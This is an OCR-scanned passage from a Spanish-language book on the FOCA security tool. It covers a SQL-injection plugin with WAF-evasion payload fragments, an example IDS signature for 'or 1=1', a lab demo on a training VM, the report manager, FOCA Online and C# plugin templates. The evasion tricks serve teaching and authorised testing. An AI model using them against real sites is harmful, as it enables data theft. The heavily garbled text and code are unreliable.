arreglaron  y  agradecieron  publicamente. 


Plugin  Auto  SQLi  searcher 

Otro  de  los  mievos  plugins  disponibles  para  FOCA  es  el  plugin  MySQL  Injector,  que  permite 
automatizar  la  extraction  de  datos  de  una  aplicacion  web  de  la  quo  se  ha  determ  in  ado  que  es 
vulnerable  a  un  ataque  de  SQL  injection. 

Los  ataques  de  SQL  injection  tienen  exito  cuando  una  aplicacion  web  concatena  en  las  consultas  a 
la  base  de  datos  la  infomiacion  enviada  por  los  usuarios  de  la  aplicacion  sin  filtrar  y  sin  validar,  lo 
que  abre  la  puerta  a  que  un  atacante  pueda  ejecutar  comandos  mediante  la  concatenacion  de  datos 
manipulados  para  extraer  y  modificar  la  infomiacion  del  servidor. 

Ademas  de  las  tecnicas  de  SOL  injection  y  Blind  SQL  injection,  el  plugin  MySQL  Injector  incorpora 
tecnicas  de  evasion  de  WAF  {Web  Application  Firewalls)  para  tratar  de  saltarse  las  protecciones  y 
fiJtros  que  estos  dispositivos  estableeen  para  proteger  el  servidor  web. 

La  may  aria  de  los  WAF  e  IDS  {Intrusion  Detection  Systems)  suelen  configurarse  como  un  proxy 
re  verso  o  como  un  modulo  del  propio  servidor  web  y  se  basan  habitualmente  en  el  uso  de  firmas, 
de  forma  que  analizan  cada  una  de  las  peticiones  recibidas  por  el  servidor  buscando  determinados 
patrones,  como  1=F\  para  hloquear  aquellas  peticiones  que  ban  sido  marcadas  como 
sospechosas  en  la  politica  establecida  por  el  administrador 

El  siguiente  cod  i  go  podria  ser  un  ejemplo  (sencillo)  de  una  firm  a  dc  un  WAF  {\vuz  protege  a  I  servidor 
de  ataques  SQL  injection: 

alert  lep  any  any  ->  $HTTP  SERVERS  $HTTF_ PORTS  \ 

(msg:  uDetectado  ataque  SQL  injection t  Tu  JR  ha  sida  registrada"1;  \ 
flow:  to  server,  established;  content :  or  1—1  — ";  nocase;  5  id;  1;  rev:  1;  ) 
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Imagen  05.26:  Configuration  del  plugin  MySQL  Injector. 


El  plugin  MySQL  Injector  hace  uso  de  diferentes  tecnicas  para  tratar  de  evadir  estos  filtros.  como  la 
sustitucion  del  operador  “and”  por  los  caraetercs  “%26%26”,  o  del  operador  “or”  por  *'||  ”,  el  uso  de 
cotnenlarios  (“or  ]/**/=/**/]”)  o  la  imercalacion  de  letras  mayusculas  y  minusculas  en  la  peticion, 
y  el  usuario  de  FOCA  puede  elegir  y  modificar  estos  parametros  en  las  opciones  de  configu radon 
del  plugin ,  tal  y  como  se  muestra  en  la  imagen  05.25  de  la  pagina  anterior. 

Para  mostrar  el  funcionamienlo  de  este  plugin  se  va  a  hacer  uso  de  los  ejercieios  Web  for  pentesters 
de  Femes  tersLah4,  que  es  un  proyecto  creado  por  Louis  Nyffenegger  disenado  con  el  objetivo  de 
ayudar  a  usuarios  noveles  en  el  arte  del  pen  testing  a  conocer  las  vulnerabilidades  mas  comunes  de 
las  aplicaciones  web , 

El  curso  incluye  una  maquina  virtual  que  el  usuario  puede  utilizar  para  realizar  Pruebas  de  Concepto 
de  los  diferentes  ejercieios  y  desaflios  que  se  proponen  %  como  no  puede  ser  de  otra  forma,  una  de 
las  vulnerabilidades  estudiadas  en  estos  ejercieios  son  las  inyecciones  SQL. 

En  la  imagen  siguiente  se  puede  ver  el  resultado  que  se  obtiene  tras  analizar  una  direction  Url  del 
servidor  web  que  el  proyecto  distribuye  detectando  que  el  parametro  que  recibe  la  url  es  vulnerable. 
Una  vez  descubierto  un  parametro  vulnerable  el  usuario  puede  hacer  uso  de  los  botones  Dbs,  Tables 
y  Columns  del  para  que  la  herramienta  trate  de  obtener  el  nombre  de  la  base  de  dates,  sus  lab! as  y 
las  columnas  de  cada  tab  I  a. 


4  //7TP;//pentes  ter  lab.  corn/ 
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Imagen  05.27:  Analizando  ana  url  para  comprobar  si  un  parametro  cs  vulnerable  . 


Seleccionando  cada  una  de  las  tablas  que  aparecen  en  el  arbol  de  objetios,  el  usuario  tambien  puede 
usar  el  plugin  para  tratar  de  extraer  los  datos  almacenados  en  el  la,  Estos  dates  se  visualizan  tal  y 
como  se  puede  ver  en  la  imagen  siguiente. 


Imagen  05.28:  Datos  extrafdos  con  el  plugin  de  la  tab  la  users. 

Es  evidente  que  el  ejemplo  mostrado  se  trata  de  una  inyeecion  SQL  de  libro,  preparado  para  ser 
utilizado  en  un  aula  o  en  laboratorio  de  pruebas.  Sin  embargo,  a  pesar  de  ser  unas  teenicas  con  mas 
de  10  anos  de  vida,  de  ser  muy  conocidas  y  estudiadas  por  todos  los  expertos  en  seguridad  y  de  que 
ex  is  ten  multitud  de  herramientas  automations  de  deteccion,  lo  cierto  es  que,  segun  OWASP  (Open 
Web  Application  Security  Project),  las  teenicas  de  inyeecion  de  codigo  ocupan  el  primer  puesto  en 
el  top  10  de  vectores  de  ataque  mas  probables  a  aplicaciones  web,  y  siguen  conoeiendose  noticias  de 
sitios  de  comp  an  fas  importantes  que  ban  sido  comprometidos  por  una  Vulnerabilidad  de  este  tipo. 
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Un  ejemplo  muy  son  a  do  se  ha  producido  a  comienzos  del  aho  2013,  a  I  reconoeer  la  empresa  BU9b 
que  uno  de  sus  servidores  web  conectados  a  Internet  habia  si  do  comprometido  utilizando  un  ataque 
de  SQL  injection,  lo  que  ironicamente  habia  permitido  a  los  deiincuentes  utilizar  I  os  si  stem  as  de  Bit9 
coino  plataforma  para  atacara  otras  compamas. 

La  plataforma  de  seguridad  basada  en  la  confianza  (Trust-based  Security  Platform)  de  BU9 5  que  es 
utilizada  por  empresas  incluidas  en  la  Fortune  500  (las  500  compafnas  que  facturan  mas  dinero  de 
Eslados  Unidos)  e,  incluso,  por  agendas  de  defen sa  y  aeroespaciales  del  gobiemo  federal  de  este 
pais,  monitoriza  loda  la  actividad  de  los  equipos  y  serv  idores  en  los  que  se  instala  ia  solucion  para, 
utilizando  un  software  de  reputacion  en  la  nube  combinado  con  una  serie  de  pohticas  detin idas  por 
los  administradores  y  una  lista  b  lane  a,  tratar  de  detectar  y  detener  amenazas  que  suelen  eseapar  de 
!  os  s  i  stem  as  an  ti  malware  tr  a  did  on  a  1  e  s . 

Segun  la  version  del  CTO  de  la  empresa,  los  atacantes  consiguieron  acceso  a  la  maquina  virtual 
que  se  usa  para  firmar  su  codigo,  de  in  an  era  que  pudieron  utilizar  el  certificado  de  Bit9  para 
firmar  32  programas  maliciosos,  troyanos  y  puertas  traseras,  fund amentalmente ,  De  esta  forma,  el 
malware  aparecia  como  software  legitimo,  ya  que  estaba  firmado  por  Bit9,  por  lo  que  los  criminates 
pudieron  colocar  estos  programas  en  otros  si  tins  web  para  preparar  un  ataque  drive-by-Download 
aprovechandose  de  vers  i  ones  de  Java  vulnerables  para  instalar  este  malware  en  los  equipos  que 
visitaban  los  sitios  web  comprometidos* 


4.  Gestor  de  informes 

FOCA  tambien  incorpora  un  gestor  de  In  formes  para  poder  exportar  y  tratar  los  resultados  quo  se 
extraen  de  los  proyeetos.  Esta  caracteristica,  conoeida  como  FOCA  Reporting  Tool  o  el  nombre 
interno  que  se  le  puso  al  proyecto  LLLa  Foquetta ”,  es  otra  de  las  que  se  incluian  anteriormente  solo 
en  ia  version  Fro  de  FOCA ,  Es  neeesario  ten er  presente  que  esta  option  requiere  la  instalaeion  de  un 
modulo  de  Crystal  Reports ,  porque  esta  basado  en  este  software  para  crear  los  documentos. 

Ademas,  el  mddulo  no  permite  crear  in  formes  de  todos  los  elementos  del  proyecto  y  esta  centrado 
principalmente  en  los  metadatas .  Para  crear  un  informe  el  primer  paso  es  seleccionar  el  tipo  de 
infonne  que  se  quiere  realizar,  Existen  Ires  lipos: 

-  In  forme  de  documentos:  Este  infonne  generara  una  lista  de  todos  los  documentos  y  todos 
los  metadatas  descubiertos  en  cada  uno  de  ellos. 

-  In  forme  de  metadatas',  en  este  caso  se  genera  una  lista  organ  izada  por  tipos  de  metadatas , 
tales  como  usuarios,  versiones  de  softw  are,  rutas  de  impresoras,  serv  idores,  etc. 

-  In  forme  de  red:  Con  el  se  obtendra  un  resumen  de  los  datos  obtenidos  por  cada  serv  id  or, 
es  detir,  de  cada  maquina  de  la  red  se  obtendran  sus  direcciones  IP,  nombres  de  dominio 
asociados,  como  ha  sido  descubierto,  las  rutas  locales,  las  versiones  de  software,  las 
tecnologias  que  implementan,  la  information  de  fingerprinting,  etcetera. 

5  HTTP: //www xio* com/art ic lc/72 940 1  /Hacking  Vi ctim  0 Jt9  B  lames  SQL  Inj  ectionFl  aw 
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Una  vez  elegido  el  tipo  de  informe  a  generar,  el  asistente  permite  al  usuario  seleccionar  los  tipos  de 
propiedades  que  le  interesa  incluiren  el  informe  (usuarios,  carpetas,  impresoras,  correos  electronicos, 
fee  has,  otros  metadatas,  historial,  software,  datos  EXIF  y  vers  i  ones  antiguas)  y,  de  cad  a  uno  de  esos 
tipos,  los  atributos  cn  concrete  obtenidos. 


Tsf" 

Oocu-ments 

Report 

» 

jgra* 

Metadata 

'Wr9i'. 

A 

ii  WBBL 

Report 

?> 

a gl 

Domains 

Report 

« 

It  allows  the  user  to  display 
the  cfhert  ami  server 
computers  extracted  fry 
FQCA,  assigning  to  eah  of 
th*m  *hoir  corrwpotnUng 
rnefcK£ai* 


a?  & 


Se^«t  a  category  to  manage  the  attributes  of  it.  If  you  want  to  select  or  deselect 
ad  the  categories  or  attributes,  use  the  buttons  below 


Categories 
■  Usera 
M  Folders 
[?]  Printers 
m  Emails 
Dates 

[Vj  Other  Metadata 

siSSSS 

[?!  Softw»5 


pyi  AJhar 
0  Ontwimt* 

|tfi  Pah 


lmag.cn  05.29:  Seleccionar  propiedades  y  atributos  a  incluiren  el  in  forme. 


A  continuacion,  es  posible  establecer  un  filtro  por  fecha,  seleccionando  la  fecha  desde  la  que  se 
quieren  incluir  datos  en  el  informe  y  por  ultimo,  elegir  los  tipos  de  graficos  que  se  desean  agregar. 

Los  tipos  de  graficos  disponibles  son  los  siguientes: 

-  N  urn  ero  de  doe  um  entos  po  r  t  i  po 

-  Metadatas  por  tipo  de  documentos 
Usuarios  por  tipo  de  documentos 

-  U  s  uari  os  r em  oto  s  p  or  ti  po  d  e  d  oc  um  en  los 

-  Carpetas  por  tipo  de  documentos 

-  Impresoras  por  tipo  de  documentos 

-  Correos  electronicos  por  tipo  de  documentos 

-  Fechas  por  tipo  de  documentos 

-  Sof 1 ware  p  or  t  i  po  de  docu  m  entos 

-  EXIF  por  tipo  de  documentos 

H  i  s  tor  i  a  I  por  tip  o  de  do  c  umen  to  s 

-  Vers i  ones  anti  g  uas  por  t  ip  o  de  doc  um  e  n tos 
Otros  metadatas  por  tipo  de  documentos 
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Imagen  05.30:  Seleccionar  graficos  a  incluir  en  el  informe. 

En  ese  momenta,  al  pulsar  sobre  el  baton  Build,  se  genera  e!  informe  y  se  muestra  la  previsualizacion 
del  mismo  en  pantalia.  Utilizando  los  botones  de  navegacion  de  la  herramienta  el  usuario  puede  leer 
el  informe,  buscar  una  cadena  de  texto  o  apliear  un  zoom  en  alguna  zona  determ inada,  y  tambien  es 
posible  imprimir  o  exportar  el  documento  a  alguno  de  los  formatos  disponibles,  que  son  rpt  (Crystal 
Reports'),  pdf  doc ,  xls  y  rtf 


Imagen  05.31 :  Previsualizacion  del  informe  en  pantalla. 
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Una  vez  exportado  el  documento  generado  desde  el  modulo  de  informes  de  FOCA  en  cualquiera  de 
los  formates  seleecionados,  sera  posible  tratar  y  personalizar  el  informe  en  el  editor  correspondiente 
para,  por  ejemplo,  cargar  una  plantilla  y  adaptarlo  a  la  politica  de  imagen  corporativa.  La  gran 
pregunta  que  debes  hacerse  un  usuario  con  esta  opcion  es...  £tendra  metadatas  el  informe  de 
metadatas  generado  por  la  FOCA ?  Tendras  que  averiguarlo  probandolo. 

Si  loquese  desea  obteneres  un  informe  deotras  partes  del  proyecto,  como  la  parte  de  vulnerabilidades, 
o  un  informe  detallado  de  los  datos  de  un  servidor  concreto  que  ha  sido  auditado  con  FOCA ,  etcetera, 
con  esta  opcion  no  es  posible,  Como  altemativa,  lo  que  hay  que  hacer  es  ir  al  panel  de  FOCA,  elegir 
la  pane  en  la  que  esta  interesado  hacerse  el  irtfome  y  exportar  los  datos  a  un  fichero  en  formato  Txt 
que  pueda  ser  tratado  posteriormente  con  cualquier  otra  herramienta. 


f*  1 

-  u - - - 

mte  pan!  >» 

Export  data  to  file 

mmmmm 

. -  - . T  - 

Printer  PDF  Pro  Ver  G.30  Build  4782-4780  1 

Imagen  05.32;  Exportar  datos  desde  FOCA  a  un  fichero  dc  texto 


Esta  opcion  esta  disponible  en  todos  los  elementos  de  FOCA  en  las  opeioncs  del  menu  contextual 
que  se  obtiene  cuando  se  hace  clic  con  el  boton  derecho  del  raton  sobre  nn  objeto,  tal  y  como  se 
puede  ver  en  la  imagen  superior 


FOCA  Online 

Para  aquellos  usuarios  que  no  puedan  instalar  FOCA  en  su  equipo  o  que  tan  solo  necesiten  probar 
la  extraccion  de  metadatas,  es  posible  utilizer  FOCA  Online6,  una  aplicacion  web  permite  realizar 
analisis  de  metadatas  de  los  siguientes  tipos  de  fleheros:  .doc  .ppt  .pps  ,xls  .doex  .pptx  .ppsx  ,xlsx 
, sxw  .sxc  .sxi . odt  .ads  .odg  <odp  .pdf.wpd.svg  .svgz  jpg , 

Hay  que  tener  en  cuenta  que  esta  herramienta  solo  permite  analizar  los  metadatas  de  los  documentos 
de  forma  individual,  por  lo  que  no  incorpora  el  reslo  de  funcionalidades  como  las  del  descubrimiento 
de  la  red  o  el  analisis  de  vulnerabilidades.  El  funcionamiento  de  FOCA  Online  es  extremadamente 
sencillo.  El  usuario  debe  acceder  al  sitio  web,  seleccionar  el  fichero  del  que  desea  extraer  los 
metadatas  y  pulsar  sobre  el  boton  “Analizar  Fichero P\ 

Tras  unos  instantes  en  los  que  se  envia  el  fichero  al  servidor  y  FOCA  analiza  el  archive,  en  la  web  se 
visualizaran  los  metadatas  genericos  obtenidos:  sistema  operative,  aplicacion,  estadisticas,  numero 
de  edi eiones,  etcetera,  ios  datos  relatives  a  las  fechas  de  creacion  y  modificacion,  los  usuarios,  las 
rutas,  el  historial  de  edicion  del  documento  y  la  informacion  relativa  a  los  objetos  incrustados,  como 
los  datos  EXIF  de  las  imagenes  que  se  ban  insertado  en  el  documento,  que  FOCA  haya  sido  capaz 
de  extraer  del  archivo. 


6  HTTP:// w ww. in formatic a64 .com /FOCA / 
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Data*  relatives  a  las  f*ch» 

Rute&  t  ncontradas  en  el  fichero 

X-  CTMdta:  03'I=E& 2003 10:3!  :0C 

C  ^DCCCWEHtiftaNrLOCALS-t'TOTipf, 

r  Modification.  0J-FE&2Q03 

Impn-saAfi:  30-EK£-2D03  22  33-OC 

■AS 

Metadatas  oaneficos.  axtraidos 

C  'AHaduha*4. 

#  Tty  to:  ITS  INFRASTRUCTURE  DF  CCNCEALMENT  DECEPTION  AND 

feTIHIDATlON 

Historic  de  tdteiM  dd  dacunwnlo 

C  ApfitKicn:  IttaraoflOffireS? 

/  Cotfflwttn:  Latin  1 

&Autof:c *22 

Couf  ilk  tMauH 

Conwitarios; 

-  EsttdMca:  Papas  1  Wonts  3875  Charaeto*  22393  L*es  16*  Paiagitpiw:  U 

-J  Kuta,:  C JDODJM£-^^LCCALS-t  T4^n(:lAuto Ftoo & ty  km  sMMtyssd 

5  bformKbn  d*  fimdi pcf*tu*u«w:_PO_GMlO:i&E?C2E6C-6A 4  6F 3-854 

3  7F73BFA12J0O 

&  Autorcfett 

2  Numm  d»  tdlcfaNitt:  * 

CoMHCMtot: 

*  Planftfla.  NwrraLdol 

-  Ruta:  C  DCCUME^r-ptrarWIlCCALS-i  save  d  Iraq  -  wanted 

*  $»i*fru  oparartta:  Windows  Hi  40 

3  ffempo  ttifcldn:  ISO  »g 

AAtftorct22 

Usuarios  wicont  redos 

Caimndirin: 

ftuto  C  mUME~1#^10CALS'1'Tfl^Auta«e^«r/  Hrrtrfkaq  wawtyato 

&tatonMl 

ftWKfcwi 

CoMUk 

flMti 

i  Rutr  C  '.TENPirsqi  -  t*  ,1k 

&oc22 

ilM 

SytatonJPrai! 

Sat>aiksi«# 

~  C«WM3ri« 

^pharnfl 

-  Rut*;  AMflW}  -  warily  Hoc 

Tmugen  0533:  Datos  obtcnidos  del  fichero  ^TonyBlair.d&c”  con  la  herramienta  FOCA  Online. 


5.  Mas  trucos  con  FOCA 

FOCA  ya  se  ha  hecho  una  herramienta  muy  popular  en  Internet  y  mueha  getite  la  utiliza.  El 
niimero  de  descargas  de  la  herramienta  la  ultima  vez  que  se  comprobo  habia  superado  las  200.000. 
Ha  salido  en  noticias  muchas  veces  por  haber  sido  utilizada  para  destapar  alguna  polemica,  en 
muchas  conferencias  de  seguridad  se  habia  de  ellas  -  incluso  el  mitico  hacker  Kevin  Mitnick  es  un 
usuario  habitual  de  la  FOCA  y  es  comun  encontrarle  hablando  de  las  funciones  de  ella  en  todas 
sus  conferencias  y  ha  apareeido  en  operaciones  de  grupos  hackti vistas  como  AnOnymous  que  la 
utilizan  como  parte  de  sus  auditorial 

Muchas  veces,  la  forma  cn  la  que  se  utiliza  FOCA  escapa  a  los  objetivos  miciales  de  la  misma,  y  se 
Integra  de  diversas  maneras  en  los  procesos  de  auditoria,  Una  de  las  formas  en  que  se  utiliza  FOCA 
ha  sido  integrada  con  Matiego,  otra  herramienta  de  inteligencia  basada  en  OS1NT  (Open  Source 
INTelligence). 

Esta  herramienta  permits  importar  servidores,  dominios,  nombres  de  usuarios,  etcetera,  y  lo  que 
mucha  gente  haee  es,  primero  lanzar  FOCA ,  y  luego  importar  los  resultados  en  Maltego  para 
tener  una  rep  resen  lac  ion  grafica  dlnamica  de  todos  los  activos  descubiertos  y  continuar  el  proceso 
manual  mente.  Los  limites  a  la  bora  de  utilizar  FOCA  son  tuyos,  asi  que  no  te  los  pongas. 
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Imaged  05.34:  Representadon  de  equipos  descubicrtos  eti  Mairego, 


Cap  ttitio  VI.  Como  crear  plugins  para  FOCA 
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1.  Creadon  de  un  plugin  basico 

En  el  capitulo  anterior  se  ha  estado  hablando  de  como  funcionan  \m  plugins  existentes  de  FOCA , 
pero  lo  cierlo  es  quo  cada  uno  puede  extender  la  funcionalidad  de  la  herramienta  por  medio  de 
nuevos  plugins.  Actualmente  FOCA  es  capaz  de  descubrir  un  buen  mitnero  de  vulnerabilidades,  pero 
no  es  capaz  de  explotarlas  todas.  Para  eilo  podria  ser  una  buena  idea  generar  un  plugin. 

Por  poner  un  ejemplo,  FOCA  es  capaz  de  descubrir  quo  un  servidor  tiene  activado  el  modulo 
modnegotiation  que  sugiere  otros  archivos  en  el  mismo  directorio  cuando  se  pide  el  archive  sin 
extension.  Un  buen  plugin  podria  ser  aquel  que  dado  un  servidor  con  mod  negotiation  y  todas  las 
URLs  que  han  si  do  descubiertas,  basque  los  backups  abusando  de  esle  modulo. 

O  infinidad  de  funeiones  mas,  como  por  ejemplo  ahadir  herramienlas  extemas  de  escaneo  de  puertos. 
de  fingerprinting,  de  extraer  los  ficheros  de  un  thumbs  Ab  o  un  .DS  Store,  de  sacar  los  ficheros  de  la 
base  de  dates  pristine  de  Subversion  o...  el  limite  lo  pones  tu. 

En  esle  capitulo  vamos  a  ver  como  se  puede  crear  un  plugin  basico  para  que  cada  uno  os  creels 
aquellos plugins  que  necesiteis  para  cada  ocasion  y  si  quereis,  los  eompartais  con  el  resto  de  usuarios 
de  FOCA .  Como  se  ha  dicho  previamente,  la  API  de  FOCA  esta  en  la  version  0. 1,  es  decir,  en  m 
estado  muy  rudimentario,  y  por  tanto  muy  limitada  en  cuanto  a  funciones  que  se  pueden  hacer,  pero 
aun  asi  se  pueden  crear  muchas  cosas. 

FOCA  esta  desarrollada  en  .NET,  asi  como  todos  los  plugins  de  los  que  hemos  hablado,  asi  que  os 
vamos  a  contar  como  podriais  hacer  un  plugin  usando  tambien  esta  tecnologia,  pero  lo  cierto  es  que 
podriais  usar  cualquier  lenguaje  de  programacion  adaptando  las  propiedades  de  manera  adeeuada  a 
cada  tecnologia. 

En  el  caso  que  vamos  a  expliear,  con  un  plugin  basico  en  lenguaje  .NET,  utilizando  Microsoft  Visual 
Studio  -  recuerda  que  hay  versiones  gratuitas  de  este  compilador  que  puedes  uiilizar  para  programar 
estos  plugins. 
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Creadon  del  proyecto  para  el  plugin  en  Visual  Studio 

Para  crear  e!  plugin  primero  debemos  crear  un  nuevo  proyecto  de  tipo  4 Class  Library 1  para  que 
permita  la  generation  de  una  DLL  coinpilada  cuando  hayamos  terminado. 


Imagen  06.01:  Creation  del  proyecto  Class  Library  en  JCEI 


El  proyecto  debe  estar  desarrollado  sobrc  el  Framework  .NET  i.5  o  inferior  y  la  plataforma  sobre 
la  que  se  debe  com  pilar  es  para  * Any  CPU .  Esto  es  accesible  desde  las  ‘propiedades  del  proyecto  / 
Build / Platform  target'. 


imagen  06.02:  Configuration  de!  proyecto  para  Any  CPU. 
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Creadon  inidal  del  plugin  e  Integration  de  la  API  de  FOCA 

Una  vez  el  proyecto  este  ya  creado,  el  siguiente  paso  que  sera  necesario,  es  el  de  agregar  como 
referenda  la  DLL  de  la  API  de  FOCA  ( Plugins  A  Pi  DLL).  Esto  se  puede  realizar  desde  *  References 
/  A  dd  reference  /  Browse ’ . 

*  HandlerSQLi 
E>  :cM  Properties 
a  ./£  References 

'£}  PluginsAPlj 
*G>  System 

*£3  System  .configuration 
*£2  System. Core 
*0  System. Data 

_ '<3  Syst em. Data. Data SetExten si ons 

Imagen  06.03:  In  tegr  scion  de  la  A  PI  de  FOCA  ;-il  proyecto  del  plugin * 


Para  poder  llevar  a  cabo  la  comunicacion  entre  el  plugin  y  la  FOCA  mediante  la  API  sera  necesaria 
la  creadon  de  una  elase  publica  llainada  ‘ Plugin '  eon  las  propiedades  "name\  'description7  y 
kexportItems\  Esta  clase  sera  instandada  cada  vez  que  la  FOCA  cargue  el  plugin .  En  la  siguienle 
imagen  se  ve  una  plantilla  con  esta  estructura  para  que  sea  mas  facil  de  en  tender 


public  class  Plugin 

{ 

private  string  _name  -  "Name”; 

public  string  description 
{ 

get 

{ 

private  string  description  -  "Description”; 

private  Export  export  =  new  ExportQ; 

public  Plugin{) 

return  description; 

} 

{ 

set 

} 

{ 

public  string  name 

description  =  value; 

> 

{ 

> 

get 

{ 

public  Export  exportltems 

return  name; 

{ 

} 

get 

set 

{ 

{ 

return  export; 

name  =  value; 

>i 

} 

> 

} 

} 

Imagen  06.04:  Creation  dc  clase  publica  Plugin , 
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Una  vez  llegados  a  este  punto  podremos  compilar  la  DLL  y  dispondremos  de  una  libreria  basica  - 
pero  sin  funcionalidad  -  para  ser  cargada  en  FOCA  a  modo  de  plugin. 


Imageti  06,05:  Carga  y  descarga  dc  plugins. 


Desarollo  de  la  funcionalidad  del  plugin 

Cuando  ya  se  tiene  la  estnietura  para  inanejar  el  plugin,  hay  que  proceder  a  dotarlo  de  funcionalidad 
para  lo  que  habra  que  escribir  el  codigo  de  sli  funcionalidad  y  su  integracidn  con  cuatquier  proyecto 
de  FOCA .  Para  realizar  el  desarrollo  de  la  DLL  asi  como  su  depuraeion  aconsejamos  la  ere  a  cion  de 
un  n  ue vo  proyeelo  dentro  de  la  solucion  del  plugin. 


Imagen  06,06:  Crcacion  dc  un  mievo  proyecto  dentro  del  Plugin. 
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Cuando  se  haya  creado  ya.  hay  quc  tener  presente  que  este  nuevo  proyeeto  debera  ser  configurado 
como  un  ‘ StartUp  Project9  para  que  pueda  ser  ejecutado  como  primera  instancia  a  la  hora  de  llevar 
a  cabo  los  procesos  de  depuraeion  del  plugin .  En  la  siguieme  imagen  se  puede  ver  como  debe  ser 
configurada  esta  caracteristica  del  proyeeto  en  Visual  Studio. 

View  Class  Diagram 

Set  as  StartUp  Project 

Debug 

Imogen  06,07:  Configuration  del  proyeeto  como  Startup  Project. 


Una  vez  hecho  esto,  sera  entonces  en  el  k handler ?  desde  donde  aeonsejarnos  realizar  las  llamadas 
e  inicializacion  de  nuestra  DLL.  Este  es  sin  embargo  unieamente  un  consejo  para  llevar  a  cabo  el 
desarrollo  o  depuraeion  de  la  libreria. 

En  la  siguiente  captura  se  puede  ver  el  codigo  fuente  de  un  plugin  en  el  que  uno  de  los  ‘handler 
esta  encargandose  de  mostrar  un  formulano  local  izado  en  el  eontenido  del  proyeeto  de  este  plugin 
de  ejem  plo. 

Busing  System; 

using  System. Collections .Generic; 

!  using  System, Threading; 

I  using  System, Text; 

E namespace  handler 

|{ 

B  class  Program 

t 

□  static  void  Main(string[]  args) 

{ 

Start () ; 

I  } 

I 

□  static  private  void  Start() 

{ 

svndownloader. Plugin .mainForm  =  new  svndownloader.MainQ j 
svn down loader. Plugin .main Form . ShcwDialog( ) ; 

i  -  > 

} 

[} 


Imagen  06.08:  Handler  mostrando  el  cuadro  de  dialogo. 
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2.  GUI  del  plugin 

Una  vez  ya  creado  el  proyecto,  1 1  eg  a  el  memento  de  decidir  dial  va  a  set  la  forma  en  la  qne  el  usuario 
de  FOCA  va  a  visual  izar  I  os  resultados  e  interactuar  con  las  funcionalidades  del  plugin,  Para  disenar 
el  aspecto  graft  co  que  tendra  el  plugin^  con  la  version  actual  de  la  API  de  FOCA  se  permiten  dos 
modes  distintos  para  interactuar  con  la  inter faz  GUI  de  la  propia  FOCA :  El  GUI  de  un  plugin  podra 
tener  una  interaccion  con  ventanas  independientes  o  per  medio  de  paneles  que  estaran  embebidos 
dentro  de  FOCA , 

En  el  desarrollo  de  un  plugin  que  tenga  un  GUI  por  ventanas,  sera  el  propio  plugin  el  encargado  de 
crear  y  mostrar  los  formularies  que  desee  para  visualizar  la  mformacion  y  el  diseno  de  interfaz  que 
se  hay  a  creado,  Este  mo  do  de  trabajo  es  muy  similar  a  la  forma  habitual  de  creacion  de  program  as 
en  la  que  se  desarrolla  una  aplieaeion  eserila  con  Windows  Forms. 

En  los  plugins  que  hemos  visto  anterioimente  existen  las  dos  modalidades.  Por  ejemplo,  en  la 
irnagen  siguiente  se  ve  el  plugin  de  MySQL  Injector  en  el  que  se  ha  definido  que  la  interaccion  con 
FOCA  usando  una  visual  izacidn  mediante  este  si  stem  a  de  ventana. 


Imagen  06.09:  Plugin  con  visualizacion  en  modo  ventana, 

Guando  se  disena  un  plugin  con  el  si  stem  a  de  paneles  embebidos,  se  permite  al  plugin  integrate 
dentro  de  la  propia  interfaz  que  tiene  la  lierramienta  de  la  FOCA.  Este  es  el  sistema  que  se  ha 
empleado  para  la  mayoria  de  los  plugins ,  como  el  WebFuzzer ,  o  el  SVN  Extractor. 

Para  poder  hacer  esta  tntegracion,  es  neeesario  realizar  la  creacion  de  un  panel  dentro  del  proyecto 
e  introducir  dentro  del  mismo  los  eonlroles  que  se  deseen  exportar  a  la  interfaz  para  que  sc  puedan 
p  intar  dentro  de  la  GUI  de  FOCA. 
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En  la  siguiente  captura  sc  ve  d  aspecto  quo  tendra  un  plugin  quc  ha  dec  i  dido  que  la  interace  ion  sea 
utilizando  paneles.  Como  se  puede  ver  en  la  imagen  siguiente,  es  parte  de  la  GUI  de  FOCA. 


Imagen  06.1 0:  Plugin  con  visual i^aci6n  en  modo  panel. 


Para  embeber  en  la  FOCA  uno  de  estos  paneles  es  necesario  hacer  uso  del  objeto  FluginPaml  ’ 
[PluginsAPLE lements. PluginPanel)  y  anadirlo  a  la  lista  de  exportation,  tal  y  como  se  puede  ver  en 
el  siguiente  ejemplo: 

public  Plugin (} 

{ 

Panel  panelForm  -  new  Panel () ; 

PluginPanel  panelPlugin  —  new  PluginPanel (panelForm,  false) ; 
export .Add (panelPlugin }  ; 

} 

Una  vez  anadido  el  panel  el  siguiente  paso  necesario  es  implementar  la  funeionalidad  para  mostrar 
el  panel.  Esto  puede  llevarse  a  cabo  anadiendo  un  nuevo  item  en  el  menu  desplegable  de  plugins 
exportando  el  objeto  4  Plugin  ToolStripMen  id  tern  ’ ,  tal  y  como  se  puede  ver  en  el  siguiente  codigo  de 
ejemplo: 

public  Plupirr() 

Panel  panelForm  —  new  Panel  (); 

PluginPanel  panelPlugin  —  new  PluginPanel (panelForm,  false) ; 
ToolStripMenuItem  toolStripMenu  =  new  ToolStr ipMenuItem (_name) ; 
toolStripMenu , Image  =  Properties . Resources . cookie ; 
toolStripHenu , Click  +—  delegate 
{ 

panelForm . BringToFront () ; 
panelForm . Visible  —  true; 

> ; 

PluginToolStripMenuXtem  toolStripPlugin  =  new 
PluginToo ISt ripMemil tern (toolStripMenu) ; 
export .Add (toolStripPlugin) ; 
export . Add (panel  Plugin) ; 
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Con  el  codigo  quo  se  ha  visto,  cuando  se  ejecule  el  plugin  se  obtendra  un  resultado  similar  al  que  se 
puede  ver  en  ia  siguiente  captura  de  pantalla,  donde  se  ha  embebido  un  panel  vacio. 


Imagen  06, 1 1 :  Plugin  de  ejemplo  embebido  en  FOCA . 

Adenias  del  panel  embebido,  en  la  imagen  06.11  se  puede  ver  que  tambien  se  ha  agregado  un 
L  Tools  trip  Item'  en  el  menu  desplegable  que  aparece  al  haeer  clic  sobre  la  opcion  de  'Plugins9.  All! 
es  donde  se  Hstanin  todos  los plugins  que  se  hayan  ido  cargando  en  la  herranraienta  FOCA.  Ademas, 
desde  esa  opcion  se  pod  ran  cargar  y  descargar  todos  los  plugins. 

Con  esta  informacion  minima  se  pennite  interactuar  ya  al  plugin  eon  FOCA  y  a  la  FOCA  con  el 
plugin  desde  un  pun  to  de  vista  de  Interfax.  Elegir  uno  u  otro  metodo  de  visualizaeidn  debera  ser 
decision  del  programador  pensando  siempre  en  lo  que  sea  mejor  para  el  uso  del  plugin,  ya  que  cada 
uno  de  el  los  tiene  ventajas  e  inconvenientes. 

